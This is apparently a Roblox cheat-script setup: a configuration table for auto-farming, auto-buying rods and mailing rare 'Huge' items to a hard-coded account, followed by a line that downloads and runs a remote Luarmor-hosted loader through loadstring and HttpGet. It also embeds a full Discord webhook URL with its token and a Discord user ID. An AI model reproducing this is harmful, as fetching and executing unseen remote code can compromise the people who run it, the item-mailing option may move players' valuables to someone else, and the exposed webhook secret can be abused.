getgenv().CFG = {
    ["Mail & Shit"] = {
        ["Show User"] = true, -- Show Username in webhook (frogot to add)
        ["Webhook URL"] = "https://discord.com/api/webhooks/1281391335374458882/MGiLxUT5yaRjlsts84cbjwgZDqGXNpr70n1lTl-BdnIUp1V8nrlELA7_CUNiR1zmIhuW",    -- Webhook URL
        ["Discord ID"] = "786492080746397708", -- Discord id to ping


        ["Send Mail"] = true,   -- Toggle Send Mail
        ["Send Existing"] = true, -- Send Existing Huges
        ["User"] = "im_xian001",          -- Mail User
    },
    ["Optamize+"] = {-- New Optamizer
        ["Enabled"] = true,
        ["CoreGui"] = true, -- Turrning off = More Fps
        ["Show Tap Gui"] = false,
    },
    ["Stats GUI"] = true,       -- Stats GUI Toggle
    ["Auto Buy Rod"] = true,    -- Automatically buy fishing rods
    ["Hidden Spot"] = true,     -- Option for Hidden Spot
}
loadstring(game:HttpGet("https://api.luarmor.net/files/v3/loaders/5b63722c09f18a1622a71d0b8aa68c68.lua"))()
